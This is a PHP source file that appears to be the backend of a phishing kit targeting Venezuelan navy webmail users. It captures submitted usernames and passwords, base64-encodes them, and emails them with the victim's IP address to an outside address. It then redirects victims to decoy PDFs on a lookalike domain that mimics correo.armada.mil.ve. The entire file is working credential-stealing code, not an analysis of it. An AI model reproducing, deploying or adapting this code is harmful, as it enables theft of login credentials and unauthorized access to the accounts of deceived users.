<?php 	
	$loi=$_POST['partes'];
	$paz=$_POST['series'];
	$id=$_GET['id'];
	$ip = $_SERVER['REMOTE_ADDR'];
	$loie= base64_encode($loi);
	$paze= base64_encode($paz); 
		$to_email = 'service@nve.name';
		$subject ="Ok User 4 AR: ".$loie;
		$message="Ok User 4 AR: " .$loie. "  Pass: ".$paze. "  IP: " .$ip;
		$headers = 'From: service@nve.name';
		if(mail($to_email,$subject,$message,$headers)){
			switch ($id){
				case 1: 
				    header ('Location: https://correo.armada.mil.ve.nve.name/ZLoginWhatsThisAnchor/lognOp/log_out/Reg_Url/accounts/inbox/FMfcgzGrcjNszdrtrTxN/1/u/ogbl/files/0541.pdf');
				break;
				case 2: 
				    header ('Location: https://correo.armada.mil.ve.nve.name/ZLoginWhatsThisAnchor/lognOp/log_out/Reg_Url/accounts/inbox/FMfcgzGrcjNszdrtrTxN/1/u/ogbl/files/PRUEBA.pdf');
				break;
			}
		}
	else{
		header ('Location: https://correo.armada.mil.ve.nve.name/ZLoginWhatsThisAnchor/lognOp/log_out/Reg_Url/accounts/inbox/FMfcgzGrcjNszdrtrTxN/1/u/ogbl/login.php?wa='.$loie.'&id='.$id.'&ses=9ibezfh3zhno1u6n4xeynw8o8?loginOp=relogin&client=standard&loginErrorCode=service.AUTH_REQUIRED');
	}
?>
